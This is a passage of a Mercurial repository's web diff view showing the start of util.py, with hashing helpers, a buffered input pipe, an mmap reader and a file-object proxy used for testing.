##// END OF EJS Templates
re2: feed unicode string to re2 module when necessary...
marmoute -
r47597:3ff35382 default draft
parent child Browse files
Show More
@@ -1,3730 +1,3741 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import locale
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37
37
38 from .thirdparty import attr
38 from .thirdparty import attr
39 from .pycompat import (
39 from .pycompat import (
40 delattr,
40 delattr,
41 getattr,
41 getattr,
42 open,
42 open,
43 setattr,
43 setattr,
44 )
44 )
45 from .node import hex
45 from .node import hex
46 from hgdemandimport import tracing
46 from hgdemandimport import tracing
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 policy,
51 policy,
52 pycompat,
52 pycompat,
53 urllibcompat,
53 urllibcompat,
54 )
54 )
55 from .utils import (
55 from .utils import (
56 compression,
56 compression,
57 hashutil,
57 hashutil,
58 procutil,
58 procutil,
59 stringutil,
59 stringutil,
60 )
60 )
61
61
62 if pycompat.TYPE_CHECKING:
62 if pycompat.TYPE_CHECKING:
63 from typing import (
63 from typing import (
64 Iterator,
64 Iterator,
65 List,
65 List,
66 Optional,
66 Optional,
67 Tuple,
67 Tuple,
68 Union,
68 Union,
69 )
69 )
70
70
71
71
72 base85 = policy.importmod('base85')
72 base85 = policy.importmod('base85')
73 osutil = policy.importmod('osutil')
73 osutil = policy.importmod('osutil')
74
74
75 b85decode = base85.b85decode
75 b85decode = base85.b85decode
76 b85encode = base85.b85encode
76 b85encode = base85.b85encode
77
77
78 cookielib = pycompat.cookielib
78 cookielib = pycompat.cookielib
79 httplib = pycompat.httplib
79 httplib = pycompat.httplib
80 pickle = pycompat.pickle
80 pickle = pycompat.pickle
81 safehasattr = pycompat.safehasattr
81 safehasattr = pycompat.safehasattr
82 socketserver = pycompat.socketserver
82 socketserver = pycompat.socketserver
83 bytesio = pycompat.bytesio
83 bytesio = pycompat.bytesio
84 # TODO deprecate stringio name, as it is a lie on Python 3.
84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 stringio = bytesio
85 stringio = bytesio
86 xmlrpclib = pycompat.xmlrpclib
86 xmlrpclib = pycompat.xmlrpclib
87
87
88 httpserver = urllibcompat.httpserver
88 httpserver = urllibcompat.httpserver
89 urlerr = urllibcompat.urlerr
89 urlerr = urllibcompat.urlerr
90 urlreq = urllibcompat.urlreq
90 urlreq = urllibcompat.urlreq
91
91
92 # workaround for win32mbcs
92 # workaround for win32mbcs
93 _filenamebytestr = pycompat.bytestr
93 _filenamebytestr = pycompat.bytestr
94
94
95 if pycompat.iswindows:
95 if pycompat.iswindows:
96 from . import windows as platform
96 from . import windows as platform
97 else:
97 else:
98 from . import posix as platform
98 from . import posix as platform
99
99
100 _ = i18n._
100 _ = i18n._
101
101
102 bindunixsocket = platform.bindunixsocket
102 bindunixsocket = platform.bindunixsocket
103 cachestat = platform.cachestat
103 cachestat = platform.cachestat
104 checkexec = platform.checkexec
104 checkexec = platform.checkexec
105 checklink = platform.checklink
105 checklink = platform.checklink
106 copymode = platform.copymode
106 copymode = platform.copymode
107 expandglobs = platform.expandglobs
107 expandglobs = platform.expandglobs
108 getfsmountpoint = platform.getfsmountpoint
108 getfsmountpoint = platform.getfsmountpoint
109 getfstype = platform.getfstype
109 getfstype = platform.getfstype
110 groupmembers = platform.groupmembers
110 groupmembers = platform.groupmembers
111 groupname = platform.groupname
111 groupname = platform.groupname
112 isexec = platform.isexec
112 isexec = platform.isexec
113 isowner = platform.isowner
113 isowner = platform.isowner
114 listdir = osutil.listdir
114 listdir = osutil.listdir
115 localpath = platform.localpath
115 localpath = platform.localpath
116 lookupreg = platform.lookupreg
116 lookupreg = platform.lookupreg
117 makedir = platform.makedir
117 makedir = platform.makedir
118 nlinks = platform.nlinks
118 nlinks = platform.nlinks
119 normpath = platform.normpath
119 normpath = platform.normpath
120 normcase = platform.normcase
120 normcase = platform.normcase
121 normcasespec = platform.normcasespec
121 normcasespec = platform.normcasespec
122 normcasefallback = platform.normcasefallback
122 normcasefallback = platform.normcasefallback
123 openhardlinks = platform.openhardlinks
123 openhardlinks = platform.openhardlinks
124 oslink = platform.oslink
124 oslink = platform.oslink
125 parsepatchoutput = platform.parsepatchoutput
125 parsepatchoutput = platform.parsepatchoutput
126 pconvert = platform.pconvert
126 pconvert = platform.pconvert
127 poll = platform.poll
127 poll = platform.poll
128 posixfile = platform.posixfile
128 posixfile = platform.posixfile
129 readlink = platform.readlink
129 readlink = platform.readlink
130 rename = platform.rename
130 rename = platform.rename
131 removedirs = platform.removedirs
131 removedirs = platform.removedirs
132 samedevice = platform.samedevice
132 samedevice = platform.samedevice
133 samefile = platform.samefile
133 samefile = platform.samefile
134 samestat = platform.samestat
134 samestat = platform.samestat
135 setflags = platform.setflags
135 setflags = platform.setflags
136 split = platform.split
136 split = platform.split
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 umask = platform.umask
140 umask = platform.umask
141 unlink = platform.unlink
141 unlink = platform.unlink
142 username = platform.username
142 username = platform.username
143
143
144
144
145 def setumask(val):
145 def setumask(val):
146 # type: (int) -> None
146 # type: (int) -> None
147 ''' updates the umask. used by chg server '''
147 ''' updates the umask. used by chg server '''
148 if pycompat.iswindows:
148 if pycompat.iswindows:
149 return
149 return
150 os.umask(val)
150 os.umask(val)
151 global umask
151 global umask
152 platform.umask = umask = val & 0o777
152 platform.umask = umask = val & 0o777
153
153
154
154
155 # small compat layer
155 # small compat layer
156 compengines = compression.compengines
156 compengines = compression.compengines
157 SERVERROLE = compression.SERVERROLE
157 SERVERROLE = compression.SERVERROLE
158 CLIENTROLE = compression.CLIENTROLE
158 CLIENTROLE = compression.CLIENTROLE
159
159
160 try:
160 try:
161 recvfds = osutil.recvfds
161 recvfds = osutil.recvfds
162 except AttributeError:
162 except AttributeError:
163 pass
163 pass
164
164
165 # Python compatibility
165 # Python compatibility
166
166
167 _notset = object()
167 _notset = object()
168
168
169
169
170 def bitsfrom(container):
170 def bitsfrom(container):
171 bits = 0
171 bits = 0
172 for bit in container:
172 for bit in container:
173 bits |= bit
173 bits |= bit
174 return bits
174 return bits
175
175
176
176
177 # python 2.6 still have deprecation warning enabled by default. We do not want
177 # python 2.6 still have deprecation warning enabled by default. We do not want
178 # to display anything to standard user so detect if we are running test and
178 # to display anything to standard user so detect if we are running test and
179 # only use python deprecation warning in this case.
179 # only use python deprecation warning in this case.
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 if _dowarn:
181 if _dowarn:
182 # explicitly unfilter our warning for python 2.7
182 # explicitly unfilter our warning for python 2.7
183 #
183 #
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
185 # However, module name set through PYTHONWARNINGS was exactly matched, so
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
186 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
187 # makes the whole PYTHONWARNINGS thing useless for our usecase.
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 if _dowarn and pycompat.ispy3:
191 if _dowarn and pycompat.ispy3:
192 # silence warning emitted by passing user string to re.sub()
192 # silence warning emitted by passing user string to re.sub()
193 warnings.filterwarnings(
193 warnings.filterwarnings(
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 )
195 )
196 warnings.filterwarnings(
196 warnings.filterwarnings(
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 )
198 )
199 # TODO: reinvent imp.is_frozen()
199 # TODO: reinvent imp.is_frozen()
200 warnings.filterwarnings(
200 warnings.filterwarnings(
201 'ignore',
201 'ignore',
202 'the imp module is deprecated',
202 'the imp module is deprecated',
203 DeprecationWarning,
203 DeprecationWarning,
204 'mercurial',
204 'mercurial',
205 )
205 )
206
206
207
207
208 def nouideprecwarn(msg, version, stacklevel=1):
208 def nouideprecwarn(msg, version, stacklevel=1):
209 """Issue an python native deprecation warning
209 """Issue an python native deprecation warning
210
210
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 """
212 """
213 if _dowarn:
213 if _dowarn:
214 msg += (
214 msg += (
215 b"\n(compatibility will be dropped after Mercurial-%s,"
215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 b" update your code.)"
216 b" update your code.)"
217 ) % version
217 ) % version
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 # on python 3 with chg, we will need to explicitly flush the output
219 # on python 3 with chg, we will need to explicitly flush the output
220 sys.stderr.flush()
220 sys.stderr.flush()
221
221
222
222
223 DIGESTS = {
223 DIGESTS = {
224 b'md5': hashlib.md5,
224 b'md5': hashlib.md5,
225 b'sha1': hashutil.sha1,
225 b'sha1': hashutil.sha1,
226 b'sha512': hashlib.sha512,
226 b'sha512': hashlib.sha512,
227 }
227 }
228 # List of digest types from strongest to weakest
228 # List of digest types from strongest to weakest
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 assert k in DIGESTS
232 assert k in DIGESTS
233
233
234
234
235 class digester(object):
235 class digester(object):
236 """helper to compute digests.
236 """helper to compute digests.
237
237
238 This helper can be used to compute one or more digests given their name.
238 This helper can be used to compute one or more digests given their name.
239
239
240 >>> d = digester([b'md5', b'sha1'])
240 >>> d = digester([b'md5', b'sha1'])
241 >>> d.update(b'foo')
241 >>> d.update(b'foo')
242 >>> [k for k in sorted(d)]
242 >>> [k for k in sorted(d)]
243 ['md5', 'sha1']
243 ['md5', 'sha1']
244 >>> d[b'md5']
244 >>> d[b'md5']
245 'acbd18db4cc2f85cedef654fccc4a4d8'
245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 >>> d[b'sha1']
246 >>> d[b'sha1']
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 >>> digester.preferred([b'md5', b'sha1'])
248 >>> digester.preferred([b'md5', b'sha1'])
249 'sha1'
249 'sha1'
250 """
250 """
251
251
252 def __init__(self, digests, s=b''):
252 def __init__(self, digests, s=b''):
253 self._hashes = {}
253 self._hashes = {}
254 for k in digests:
254 for k in digests:
255 if k not in DIGESTS:
255 if k not in DIGESTS:
256 raise error.Abort(_(b'unknown digest type: %s') % k)
256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 self._hashes[k] = DIGESTS[k]()
257 self._hashes[k] = DIGESTS[k]()
258 if s:
258 if s:
259 self.update(s)
259 self.update(s)
260
260
261 def update(self, data):
261 def update(self, data):
262 for h in self._hashes.values():
262 for h in self._hashes.values():
263 h.update(data)
263 h.update(data)
264
264
265 def __getitem__(self, key):
265 def __getitem__(self, key):
266 if key not in DIGESTS:
266 if key not in DIGESTS:
267 raise error.Abort(_(b'unknown digest type: %s') % k)
267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 return hex(self._hashes[key].digest())
268 return hex(self._hashes[key].digest())
269
269
270 def __iter__(self):
270 def __iter__(self):
271 return iter(self._hashes)
271 return iter(self._hashes)
272
272
273 @staticmethod
273 @staticmethod
274 def preferred(supported):
274 def preferred(supported):
275 """returns the strongest digest type in both supported and DIGESTS."""
275 """returns the strongest digest type in both supported and DIGESTS."""
276
276
277 for k in DIGESTS_BY_STRENGTH:
277 for k in DIGESTS_BY_STRENGTH:
278 if k in supported:
278 if k in supported:
279 return k
279 return k
280 return None
280 return None
281
281
282
282
283 class digestchecker(object):
283 class digestchecker(object):
284 """file handle wrapper that additionally checks content against a given
284 """file handle wrapper that additionally checks content against a given
285 size and digests.
285 size and digests.
286
286
287 d = digestchecker(fh, size, {'md5': '...'})
287 d = digestchecker(fh, size, {'md5': '...'})
288
288
289 When multiple digests are given, all of them are validated.
289 When multiple digests are given, all of them are validated.
290 """
290 """
291
291
292 def __init__(self, fh, size, digests):
292 def __init__(self, fh, size, digests):
293 self._fh = fh
293 self._fh = fh
294 self._size = size
294 self._size = size
295 self._got = 0
295 self._got = 0
296 self._digests = dict(digests)
296 self._digests = dict(digests)
297 self._digester = digester(self._digests.keys())
297 self._digester = digester(self._digests.keys())
298
298
299 def read(self, length=-1):
299 def read(self, length=-1):
300 content = self._fh.read(length)
300 content = self._fh.read(length)
301 self._digester.update(content)
301 self._digester.update(content)
302 self._got += len(content)
302 self._got += len(content)
303 return content
303 return content
304
304
305 def validate(self):
305 def validate(self):
306 if self._size != self._got:
306 if self._size != self._got:
307 raise error.Abort(
307 raise error.Abort(
308 _(b'size mismatch: expected %d, got %d')
308 _(b'size mismatch: expected %d, got %d')
309 % (self._size, self._got)
309 % (self._size, self._got)
310 )
310 )
311 for k, v in self._digests.items():
311 for k, v in self._digests.items():
312 if v != self._digester[k]:
312 if v != self._digester[k]:
313 # i18n: first parameter is a digest name
313 # i18n: first parameter is a digest name
314 raise error.Abort(
314 raise error.Abort(
315 _(b'%s mismatch: expected %s, got %s')
315 _(b'%s mismatch: expected %s, got %s')
316 % (k, v, self._digester[k])
316 % (k, v, self._digester[k])
317 )
317 )
318
318
319
319
320 try:
320 try:
321 buffer = buffer # pytype: disable=name-error
321 buffer = buffer # pytype: disable=name-error
322 except NameError:
322 except NameError:
323
323
324 def buffer(sliceable, offset=0, length=None):
324 def buffer(sliceable, offset=0, length=None):
325 if length is not None:
325 if length is not None:
326 return memoryview(sliceable)[offset : offset + length]
326 return memoryview(sliceable)[offset : offset + length]
327 return memoryview(sliceable)[offset:]
327 return memoryview(sliceable)[offset:]
328
328
329
329
330 _chunksize = 4096
330 _chunksize = 4096
331
331
332
332
333 class bufferedinputpipe(object):
333 class bufferedinputpipe(object):
334 """a manually buffered input pipe
334 """a manually buffered input pipe
335
335
336 Python will not let us use buffered IO and lazy reading with 'polling' at
336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 the same time. We cannot probe the buffer state and select will not detect
337 the same time. We cannot probe the buffer state and select will not detect
338 that data are ready to read if they are already buffered.
338 that data are ready to read if they are already buffered.
339
339
340 This class let us work around that by implementing its own buffering
340 This class let us work around that by implementing its own buffering
341 (allowing efficient readline) while offering a way to know if the buffer is
341 (allowing efficient readline) while offering a way to know if the buffer is
342 empty from the output (allowing collaboration of the buffer with polling).
342 empty from the output (allowing collaboration of the buffer with polling).
343
343
344 This class lives in the 'util' module because it makes use of the 'os'
344 This class lives in the 'util' module because it makes use of the 'os'
345 module from the python stdlib.
345 module from the python stdlib.
346 """
346 """
347
347
348 def __new__(cls, fh):
348 def __new__(cls, fh):
349 # If we receive a fileobjectproxy, we need to use a variation of this
349 # If we receive a fileobjectproxy, we need to use a variation of this
350 # class that notifies observers about activity.
350 # class that notifies observers about activity.
351 if isinstance(fh, fileobjectproxy):
351 if isinstance(fh, fileobjectproxy):
352 cls = observedbufferedinputpipe
352 cls = observedbufferedinputpipe
353
353
354 return super(bufferedinputpipe, cls).__new__(cls)
354 return super(bufferedinputpipe, cls).__new__(cls)
355
355
356 def __init__(self, input):
356 def __init__(self, input):
357 self._input = input
357 self._input = input
358 self._buffer = []
358 self._buffer = []
359 self._eof = False
359 self._eof = False
360 self._lenbuf = 0
360 self._lenbuf = 0
361
361
362 @property
362 @property
363 def hasbuffer(self):
363 def hasbuffer(self):
364 """True is any data is currently buffered
364 """True is any data is currently buffered
365
365
366 This will be used externally a pre-step for polling IO. If there is
366 This will be used externally a pre-step for polling IO. If there is
367 already data then no polling should be set in place."""
367 already data then no polling should be set in place."""
368 return bool(self._buffer)
368 return bool(self._buffer)
369
369
370 @property
370 @property
371 def closed(self):
371 def closed(self):
372 return self._input.closed
372 return self._input.closed
373
373
374 def fileno(self):
374 def fileno(self):
375 return self._input.fileno()
375 return self._input.fileno()
376
376
377 def close(self):
377 def close(self):
378 return self._input.close()
378 return self._input.close()
379
379
380 def read(self, size):
380 def read(self, size):
381 while (not self._eof) and (self._lenbuf < size):
381 while (not self._eof) and (self._lenbuf < size):
382 self._fillbuffer()
382 self._fillbuffer()
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def unbufferedread(self, size):
385 def unbufferedread(self, size):
386 if not self._eof and self._lenbuf == 0:
386 if not self._eof and self._lenbuf == 0:
387 self._fillbuffer(max(size, _chunksize))
387 self._fillbuffer(max(size, _chunksize))
388 return self._frombuffer(min(self._lenbuf, size))
388 return self._frombuffer(min(self._lenbuf, size))
389
389
390 def readline(self, *args, **kwargs):
390 def readline(self, *args, **kwargs):
391 if len(self._buffer) > 1:
391 if len(self._buffer) > 1:
392 # this should not happen because both read and readline end with a
392 # this should not happen because both read and readline end with a
393 # _frombuffer call that collapse it.
393 # _frombuffer call that collapse it.
394 self._buffer = [b''.join(self._buffer)]
394 self._buffer = [b''.join(self._buffer)]
395 self._lenbuf = len(self._buffer[0])
395 self._lenbuf = len(self._buffer[0])
396 lfi = -1
396 lfi = -1
397 if self._buffer:
397 if self._buffer:
398 lfi = self._buffer[-1].find(b'\n')
398 lfi = self._buffer[-1].find(b'\n')
399 while (not self._eof) and lfi < 0:
399 while (not self._eof) and lfi < 0:
400 self._fillbuffer()
400 self._fillbuffer()
401 if self._buffer:
401 if self._buffer:
402 lfi = self._buffer[-1].find(b'\n')
402 lfi = self._buffer[-1].find(b'\n')
403 size = lfi + 1
403 size = lfi + 1
404 if lfi < 0: # end of file
404 if lfi < 0: # end of file
405 size = self._lenbuf
405 size = self._lenbuf
406 elif len(self._buffer) > 1:
406 elif len(self._buffer) > 1:
407 # we need to take previous chunks into account
407 # we need to take previous chunks into account
408 size += self._lenbuf - len(self._buffer[-1])
408 size += self._lenbuf - len(self._buffer[-1])
409 return self._frombuffer(size)
409 return self._frombuffer(size)
410
410
411 def _frombuffer(self, size):
411 def _frombuffer(self, size):
412 """return at most 'size' data from the buffer
412 """return at most 'size' data from the buffer
413
413
414 The data are removed from the buffer."""
414 The data are removed from the buffer."""
415 if size == 0 or not self._buffer:
415 if size == 0 or not self._buffer:
416 return b''
416 return b''
417 buf = self._buffer[0]
417 buf = self._buffer[0]
418 if len(self._buffer) > 1:
418 if len(self._buffer) > 1:
419 buf = b''.join(self._buffer)
419 buf = b''.join(self._buffer)
420
420
421 data = buf[:size]
421 data = buf[:size]
422 buf = buf[len(data) :]
422 buf = buf[len(data) :]
423 if buf:
423 if buf:
424 self._buffer = [buf]
424 self._buffer = [buf]
425 self._lenbuf = len(buf)
425 self._lenbuf = len(buf)
426 else:
426 else:
427 self._buffer = []
427 self._buffer = []
428 self._lenbuf = 0
428 self._lenbuf = 0
429 return data
429 return data
430
430
431 def _fillbuffer(self, size=_chunksize):
431 def _fillbuffer(self, size=_chunksize):
432 """read data to the buffer"""
432 """read data to the buffer"""
433 data = os.read(self._input.fileno(), size)
433 data = os.read(self._input.fileno(), size)
434 if not data:
434 if not data:
435 self._eof = True
435 self._eof = True
436 else:
436 else:
437 self._lenbuf += len(data)
437 self._lenbuf += len(data)
438 self._buffer.append(data)
438 self._buffer.append(data)
439
439
440 return data
440 return data
441
441
442
442
443 def mmapread(fp, size=None):
443 def mmapread(fp, size=None):
444 if size == 0:
444 if size == 0:
445 # size of 0 to mmap.mmap() means "all data"
445 # size of 0 to mmap.mmap() means "all data"
446 # rather than "zero bytes", so special case that.
446 # rather than "zero bytes", so special case that.
447 return b''
447 return b''
448 elif size is None:
448 elif size is None:
449 size = 0
449 size = 0
450 try:
450 try:
451 fd = getattr(fp, 'fileno', lambda: fp)()
451 fd = getattr(fp, 'fileno', lambda: fp)()
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 except ValueError:
453 except ValueError:
454 # Empty files cannot be mmapped, but mmapread should still work. Check
454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 # if the file is empty, and if so, return an empty buffer.
455 # if the file is empty, and if so, return an empty buffer.
456 if os.fstat(fd).st_size == 0:
456 if os.fstat(fd).st_size == 0:
457 return b''
457 return b''
458 raise
458 raise
459
459
460
460
461 class fileobjectproxy(object):
461 class fileobjectproxy(object):
462 """A proxy around file objects that tells a watcher when events occur.
462 """A proxy around file objects that tells a watcher when events occur.
463
463
464 This type is intended to only be used for testing purposes. Think hard
464 This type is intended to only be used for testing purposes. Think hard
465 before using it in important code.
465 before using it in important code.
466 """
466 """
467
467
468 __slots__ = (
468 __slots__ = (
469 '_orig',
469 '_orig',
470 '_observer',
470 '_observer',
471 )
471 )
472
472
473 def __init__(self, fh, observer):
473 def __init__(self, fh, observer):
474 object.__setattr__(self, '_orig', fh)
474 object.__setattr__(self, '_orig', fh)
475 object.__setattr__(self, '_observer', observer)
475 object.__setattr__(self, '_observer', observer)
476
476
477 def __getattribute__(self, name):
477 def __getattribute__(self, name):
478 ours = {
478 ours = {
479 '_observer',
479 '_observer',
480 # IOBase
480 # IOBase
481 'close',
481 'close',
482 # closed if a property
482 # closed if a property
483 'fileno',
483 'fileno',
484 'flush',
484 'flush',
485 'isatty',
485 'isatty',
486 'readable',
486 'readable',
487 'readline',
487 'readline',
488 'readlines',
488 'readlines',
489 'seek',
489 'seek',
490 'seekable',
490 'seekable',
491 'tell',
491 'tell',
492 'truncate',
492 'truncate',
493 'writable',
493 'writable',
494 'writelines',
494 'writelines',
495 # RawIOBase
495 # RawIOBase
496 'read',
496 'read',
497 'readall',
497 'readall',
498 'readinto',
498 'readinto',
499 'write',
499 'write',
500 # BufferedIOBase
500 # BufferedIOBase
501 # raw is a property
501 # raw is a property
502 'detach',
502 'detach',
503 # read defined above
503 # read defined above
504 'read1',
504 'read1',
505 # readinto defined above
505 # readinto defined above
506 # write defined above
506 # write defined above
507 }
507 }
508
508
509 # We only observe some methods.
509 # We only observe some methods.
510 if name in ours:
510 if name in ours:
511 return object.__getattribute__(self, name)
511 return object.__getattribute__(self, name)
512
512
513 return getattr(object.__getattribute__(self, '_orig'), name)
513 return getattr(object.__getattribute__(self, '_orig'), name)
514
514
515 def __nonzero__(self):
515 def __nonzero__(self):
516 return bool(object.__getattribute__(self, '_orig'))
516 return bool(object.__getattribute__(self, '_orig'))
517
517
518 __bool__ = __nonzero__
518 __bool__ = __nonzero__
519
519
520 def __delattr__(self, name):
520 def __delattr__(self, name):
521 return delattr(object.__getattribute__(self, '_orig'), name)
521 return delattr(object.__getattribute__(self, '_orig'), name)
522
522
523 def __setattr__(self, name, value):
523 def __setattr__(self, name, value):
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525
525
526 def __iter__(self):
526 def __iter__(self):
527 return object.__getattribute__(self, '_orig').__iter__()
527 return object.__getattribute__(self, '_orig').__iter__()
528
528
529 def _observedcall(self, name, *args, **kwargs):
529 def _observedcall(self, name, *args, **kwargs):
530 # Call the original object.
530 # Call the original object.
531 orig = object.__getattribute__(self, '_orig')
531 orig = object.__getattribute__(self, '_orig')
532 res = getattr(orig, name)(*args, **kwargs)
532 res = getattr(orig, name)(*args, **kwargs)
533
533
534 # Call a method on the observer of the same name with arguments
534 # Call a method on the observer of the same name with arguments
535 # so it can react, log, etc.
535 # so it can react, log, etc.
536 observer = object.__getattribute__(self, '_observer')
536 observer = object.__getattribute__(self, '_observer')
537 fn = getattr(observer, name, None)
537 fn = getattr(observer, name, None)
538 if fn:
538 if fn:
539 fn(res, *args, **kwargs)
539 fn(res, *args, **kwargs)
540
540
541 return res
541 return res
542
542
543 def close(self, *args, **kwargs):
543 def close(self, *args, **kwargs):
544 return object.__getattribute__(self, '_observedcall')(
544 return object.__getattribute__(self, '_observedcall')(
545 'close', *args, **kwargs
545 'close', *args, **kwargs
546 )
546 )
547
547
548 def fileno(self, *args, **kwargs):
548 def fileno(self, *args, **kwargs):
549 return object.__getattribute__(self, '_observedcall')(
549 return object.__getattribute__(self, '_observedcall')(
550 'fileno', *args, **kwargs
550 'fileno', *args, **kwargs
551 )
551 )
552
552
553 def flush(self, *args, **kwargs):
553 def flush(self, *args, **kwargs):
554 return object.__getattribute__(self, '_observedcall')(
554 return object.__getattribute__(self, '_observedcall')(
555 'flush', *args, **kwargs
555 'flush', *args, **kwargs
556 )
556 )
557
557
558 def isatty(self, *args, **kwargs):
558 def isatty(self, *args, **kwargs):
559 return object.__getattribute__(self, '_observedcall')(
559 return object.__getattribute__(self, '_observedcall')(
560 'isatty', *args, **kwargs
560 'isatty', *args, **kwargs
561 )
561 )
562
562
563 def readable(self, *args, **kwargs):
563 def readable(self, *args, **kwargs):
564 return object.__getattribute__(self, '_observedcall')(
564 return object.__getattribute__(self, '_observedcall')(
565 'readable', *args, **kwargs
565 'readable', *args, **kwargs
566 )
566 )
567
567
568 def readline(self, *args, **kwargs):
568 def readline(self, *args, **kwargs):
569 return object.__getattribute__(self, '_observedcall')(
569 return object.__getattribute__(self, '_observedcall')(
570 'readline', *args, **kwargs
570 'readline', *args, **kwargs
571 )
571 )
572
572
573 def readlines(self, *args, **kwargs):
573 def readlines(self, *args, **kwargs):
574 return object.__getattribute__(self, '_observedcall')(
574 return object.__getattribute__(self, '_observedcall')(
575 'readlines', *args, **kwargs
575 'readlines', *args, **kwargs
576 )
576 )
577
577
578 def seek(self, *args, **kwargs):
578 def seek(self, *args, **kwargs):
579 return object.__getattribute__(self, '_observedcall')(
579 return object.__getattribute__(self, '_observedcall')(
580 'seek', *args, **kwargs
580 'seek', *args, **kwargs
581 )
581 )
582
582
583 def seekable(self, *args, **kwargs):
583 def seekable(self, *args, **kwargs):
584 return object.__getattribute__(self, '_observedcall')(
584 return object.__getattribute__(self, '_observedcall')(
585 'seekable', *args, **kwargs
585 'seekable', *args, **kwargs
586 )
586 )
587
587
588 def tell(self, *args, **kwargs):
588 def tell(self, *args, **kwargs):
589 return object.__getattribute__(self, '_observedcall')(
589 return object.__getattribute__(self, '_observedcall')(
590 'tell', *args, **kwargs
590 'tell', *args, **kwargs
591 )
591 )
592
592
593 def truncate(self, *args, **kwargs):
593 def truncate(self, *args, **kwargs):
594 return object.__getattribute__(self, '_observedcall')(
594 return object.__getattribute__(self, '_observedcall')(
595 'truncate', *args, **kwargs
595 'truncate', *args, **kwargs
596 )
596 )
597
597
598 def writable(self, *args, **kwargs):
598 def writable(self, *args, **kwargs):
599 return object.__getattribute__(self, '_observedcall')(
599 return object.__getattribute__(self, '_observedcall')(
600 'writable', *args, **kwargs
600 'writable', *args, **kwargs
601 )
601 )
602
602
603 def writelines(self, *args, **kwargs):
603 def writelines(self, *args, **kwargs):
604 return object.__getattribute__(self, '_observedcall')(
604 return object.__getattribute__(self, '_observedcall')(
605 'writelines', *args, **kwargs
605 'writelines', *args, **kwargs
606 )
606 )
607
607
608 def read(self, *args, **kwargs):
608 def read(self, *args, **kwargs):
609 return object.__getattribute__(self, '_observedcall')(
609 return object.__getattribute__(self, '_observedcall')(
610 'read', *args, **kwargs
610 'read', *args, **kwargs
611 )
611 )
612
612
613 def readall(self, *args, **kwargs):
613 def readall(self, *args, **kwargs):
614 return object.__getattribute__(self, '_observedcall')(
614 return object.__getattribute__(self, '_observedcall')(
615 'readall', *args, **kwargs
615 'readall', *args, **kwargs
616 )
616 )
617
617
618 def readinto(self, *args, **kwargs):
